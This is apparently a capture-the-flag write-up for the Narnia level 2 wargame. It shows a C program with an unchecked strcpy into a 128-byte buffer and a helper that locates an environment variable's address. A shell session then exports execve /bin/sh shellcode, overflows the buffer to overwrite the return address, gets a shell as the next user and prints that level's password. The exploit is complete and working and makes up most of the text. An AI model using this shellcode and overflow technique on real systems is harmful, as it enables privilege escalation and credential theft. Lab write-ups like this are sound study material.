narnia2

/** narnia2.c */

/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
	char buf[128];

	if(argc == 1){
		printf("Usage: %s argument\n", argv[0]);
		exit(1);
	}
	strcpy(buf,argv[1]);
	printf("%s", buf);

	return 0;
}

/** env.c */

#include <stdio.h>
#include <stdlib.h>

/* ./env EGG /narnia/narnia2 */
int main(int argc, char *argv[])
{
	char *env = getenv(argv[1]);

	env += (strlen(argv[0]) - strlen(argv[2])) * 2;
	printf("%p\n", env);

	return 0;
}

棧環境

root@today:~# ssh [email protected]

[email protected]'s password: 

narnia2@melinda:~$ cd /tmp/shadowcoder2

narnia2@melinda:/tmp/shadowcoder2$ ls
env  env.c  narnia2  narnia2.c  shellcode.asm  shellcode.o

narnia2@melinda:/tmp/shadowcoder2$ gcc env.c -o env -m32

narnia2@melinda:/tmp/shadowcoder2$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')

narnia2@melinda:/tmp/shadowcoder2$ ./env EGG /narnia/narnia2
0xffffd8a3

narnia2@melinda:/tmp/shadowcoder2$ /narnia/narnia2 $(python -c 'print "U"*140 + "\xa3\xd8\xff\xff"')
$ whoami
narnia3
$ cat /etc/narnia_pass/narnia3
vaequeezee
$